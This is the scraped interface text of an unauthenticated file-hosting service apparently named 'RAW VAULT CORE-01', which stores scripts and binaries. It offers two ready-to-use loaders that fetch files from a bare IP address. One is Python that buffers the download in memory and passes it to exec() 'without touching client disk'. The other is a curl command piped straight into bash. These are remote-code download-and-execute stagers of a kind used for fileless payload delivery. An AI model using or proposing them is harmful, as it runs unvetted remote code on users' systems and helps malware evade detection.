R/
RAW VAULT CORE-01
NO AUTH
Select or drag & drop file
Scripts (.sh, .py, .js), binaries, configs, archives

When enabled, public direct HTTP access is disabled. Content can only be streamed chunk-by-chunk using API token. Leave unchecked for GitHub-style open raw link.

Require Bearer token and deliver via chunked in-memory streaming.

File Access Size Date Action
Loading repository...
Python: In-Memory Chunked Stream Execution

Fetches raw content in small chunks directly into RAM without touching client disk, keeping the raw endpoint unexposed:

import urllib.request TOKEN = "YOUR_API_TOKEN" URL = "http://132.243.230.94/api/v1/stream/FILE_ID" req = urllib.request.Request(URL, headers={"Authorization": f"Bearer {TOKEN}"}) with urllib.request.urlopen(req) as resp: buffer = bytearray() while True: chunk = resp.read(4096) # Stream in 4KB chunks if not chunk: break buffer.extend(chunk) # Execute or consume in memory code_str = buffer.decode("utf-8") exec(code_str)
CLI Pipe into Interpreter
curl -sH "Authorization: Bearer YOUR_TOKEN" http://132.243.230.94/api/v1/stream/FILE_ID | bash
Artifact Saved Successfully
PUBLIC
Direct RAW Link (GitHub style)
cURL Command
Streaming Endpoint URL